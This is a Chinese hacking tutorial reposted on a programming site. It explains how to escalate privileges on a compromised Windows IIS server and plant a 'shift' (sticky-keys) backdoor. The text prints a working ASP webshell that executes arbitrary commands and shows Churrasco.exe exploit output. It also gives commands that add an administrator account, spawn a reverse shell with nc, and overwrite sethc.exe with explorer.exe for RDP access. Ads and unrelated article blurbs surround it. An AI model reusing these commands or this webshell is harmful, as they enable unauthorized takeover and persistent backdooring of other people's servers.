启用shift后门的方法_服务器可以拿来干什么

启用shift后门的方法_服务器可以拿来干什么提权工具如下:cmd.exeChurrasco.exenc.exe提权前提:Wscript组件成功开启如果Wscript组件被关闭,则使用以下方法开启:源代码:<objectrunat=serverid=oScriptlhnscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>  

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>

<%

end if %>

<form method=”post”>

<input type=text name=”cmdx” size=60 value=”C:\RECYCLER\cmd.exe”><br>

<input type=text name=”cmd” size=60><br>

<input type=submit value=”net user”></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request(“cmdx”)=”C:\RECYCLER\cmd.exe” then

response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall

end if

response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/–>Current User: NETWORK SERVICE

/churrasco/–>Getting Rpcss PID …

/churrasco/–>Found Rpcss PID: 696

/churrasco/–>Searching for Rpcss threads …

/churrasco/–>Found Thread: 444

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 700

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 704

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 712

/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/–>Getting SYSTEM token from Rpcss Service…

/churrasco/–>Found szywjs Token

/churrasco/–>Found SYSTEM token 0xf1c

/churrasco/–>Running command with SYSTEM Token…

 

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

 

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe “net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe “net localgroup administrators iisuser /add”
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe “copy d:\windows\explorer.exe d:\windows\system32\sethc.exe”
  C:\RECYCLER\Churrasco.exe “copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe “
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192217.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 通过 MATLAB 处理大数据[通俗易懂]

    通过 MATLAB 处理大数据[通俗易懂]原文链接:通过MATLAB处理大数据大数据指的是创建的数据和供分析的数据的数量与速率迅速增加。大数据使分析师和数据专家有机会获得更好的见解,进行更明智的决策,但是它同时也会带来许多的挑战:可用的内存可能无法足以处理大数据集,可能需要花太久的时间进行处理或可能流动太快而无法存储标准算法通常不能以合理的时间或内存来处理大数据集等等。目前没有任何一种单一方法可以处理大数据。为此,MATLAB…

    2022年5月18日
    33
  • 少儿编程mta证书_少儿编程项目计划书

    少儿编程项目计划书未来30年是人工智能的伟大时代,学编程会让孩子的未来充满更多可能性。此项目是针对小学生,主要是以培养学习兴趣,接受最基本的编程概念,并能够通过学到的知识完成一些小的课题,激发和培养学生的编程思维。在学习的过程中,主要通过实体的编程玩具,学会构建自己的作品,比如学习编程语言,机器人等课程。本项目提供多维度的少儿编程培训服务,包括编辑机器人研发、在线编程教育培训、线下培训等。一、线下…

    2022年4月8日
    42
  • matlab中clc和clear作用_clc,clear

    matlab中clc和clear作用_clc,clearcacl()用法解析可以使用calc()给元素的border、margin、pading、font-size和width等属性设置动态值。以前我们可以使用box-sizing:border-box;来设置盒子的属性为不加上边距。现在我们又多了一个选择了。但要注意,两者只能使用一个哦,否则就会造成冲突了。calc()可以使用数学运算中的简单加(+)、减(-)、乘(*)和除(/)来解决问题,而且还可以根据单位如px,em,rem和百分比来转化计算,但是要注意,使用运算符号的时候要与两边的值有空格和间隙,否

    2025年7月23日
    2
  • 地理加权回归模型案例_地理加权回归不能用哑变量

    地理加权回归模型案例_地理加权回归不能用哑变量目前,GWR已经成为处理空间异质性的主要方法之一。与经典的全局回归模型的OLS不同,GWR是局部回归模型,模型系数是通过观测周围的样本来回归得到。在这里插入图片描述

    2022年9月1日
    3
  • 【网络基础】路由表,分组转发算法[通俗易懂]

    【网络基础】路由表,分组转发算法

    2022年1月22日
    65
  • 学习 node.js 第八天:Socket 通讯「建议收藏」

    学习 node.js 第八天:Socket 通讯「建议收藏」一般来讲,HTTP是基于文本的“单向”通讯机制。这里所谓的“单向”,乃相对于“双向”而言,因为HTTP服务器只需根据请求返还恰当的HTML给客户端即可,不涉及客户端向服务端的通讯。这种单向的机制比较简单,对网络质量要求也不高。而更多的场景则是需要可靠、稳定的端到端连接。一般这种服务是实时的、有态的而且是长连接,长连接则暗示两段须达致相向通讯的能力,也就说是服务端客户端两者间能够实时地相互间通信。毫无疑问,能够实时通信的服务器正是我们对服务器基本要求之一。区别于HTTP服务器以HTTP为通讯

    2022年6月11日
    52

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号